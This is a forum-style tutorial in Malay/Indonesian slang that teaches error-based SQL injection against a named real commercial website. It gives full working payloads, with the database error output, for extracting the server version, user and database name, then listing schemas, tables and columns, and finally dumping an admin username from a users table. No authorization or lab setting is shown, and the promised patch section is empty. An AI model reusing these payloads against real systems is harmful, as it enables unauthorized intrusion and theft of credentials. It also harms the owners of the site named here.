ane mau ajar kalian sql injection mnggunakan teknik error based.
ada banyak cara untuk lakukan error based nih.
so ane ajar yang simple and basic kalian bisa liat di forum2/blog2 sekuriti/hacking.
thanks to rozalman dia ade kasik satu web so aku leh jadikan sbg example.
before proceed take note,time bila kita leh gunakan teknik nih?
target testing :
Code:
hxxp://www.radiantwholefood.com.my/content.php?cat=136
basically,ini adalah apa yang kalian perlu tahu.
Code:
and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,sayahensem,0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
so di mana yang patutnya kita ubah2 untuk dapatkan hasil yg kita nak?
dari sini
((select concat(0x7e,0x27,sayahensem,0x27,0x7e)) from information_schema.tables limit 0,1)
so basically sama aja dengan teknik2 injection yang lain just kita perlu tukar sedikit aja.
so utk enumurate user,database,dan version yang digunakan.ane lakukan begini
Code:
http://www.radiantwholefood.com.my/content.php
?cat=136 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,version(),0x3a,user(),0x3a,database(),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
hasilnya
![[Image: 59981735514715453430.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tfzqHv1_PD3J9uqIYcrGOlIkx1ANfgkVmH07WAdZlZYWMfy8RjLpQJeseiJXpkP_TSOTGpJh1Hyq0zrmSPlD3DU9PunSpH3B1DUEFmEO7sLghu3VbmsR0=s0-d)
so utk lihat db yg kalian berminat gunakan ini
Code:
http://www.radiantwholefood.com.my/content.php
?cat=136 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
di mana di
LIMIT 0,1 kalian naikkan jadi 1,1 utk bisa liat db yg lain.
ane dapat tau db yg ane mau adalah
Code:
Duplicate entry '~'radiant_ezlitev3'~1' for key 1
hexkan nama db tersebut.akan dapat cmni
Code:
0x72616469616e745f657a6c6974657633
mau liat table_name yang wujud dlm db tersebut.
Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,table_name,0x27,0x7e) FROM information_schema.tables Where table_schema=0xdb_yang_udah_dihexkan limit 3,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
sama juga, seperti biasa kalian hanya perlu increase number of limit utk cari table yg kalian mau
Code:
http://www.radiantwholefood.com.my/content.php
?cat=136 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,table_name,0x27,0x7e) FROM information_schema.tables Where table_schema=0x72616469616e745f657a6c6974657633 limit 3,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
ane cari table_name yang ane mau iaitu
Code:
Duplicate entry '~'usertb'~1' for key 1
gimana mau liat column_name dalam table_nameitu pula ya?
kalian hanya perlu tambah ini aja.
table_name tukar kepada column_name dan information_schema.tables kepada information_schema.columns dan tambahkan code di bawah ini di dalam injection
Code:
AND table_name=0xtable_name_yg_dah_dihexkan
maka akan jadi begini
Code:
http://www.radiantwholefood.com.my/content.php
?cat=136 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,column_name,0x27,0x7e) FROM information_schema.columns Where table_schema=0x72616469616e745f657a6c6974657633 AND table_name=0x757365727462 limit 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
hasilnya
Code:
Duplicate entry '~'UserName'~1' for key 1
ane pilih column_name username.mau liat isinya pula ane gunakan begini
Code:
and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,table_name.column_name,0x27,0x7e) FROM database_name.table_name LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a
maka akan jadi begini
Code:
http://www.radiantwholefood.com.my/content.php
?cat=136 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,usertb.Username,0x27,0x7e) FROM radiant_ezlitev3.usertb LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
hasilnya
Code:
Duplicate entry '~'admin'~1' for key 1
sekian
mungkin kalian udah dapat faham gunakan teknik ini dengan tutor ini.
sekali lagi.maafkan ane klw ga faham bahasa ane gunakan ea
-----------------------------------------------------------
patch---------------------------------------------------------------
Join The Community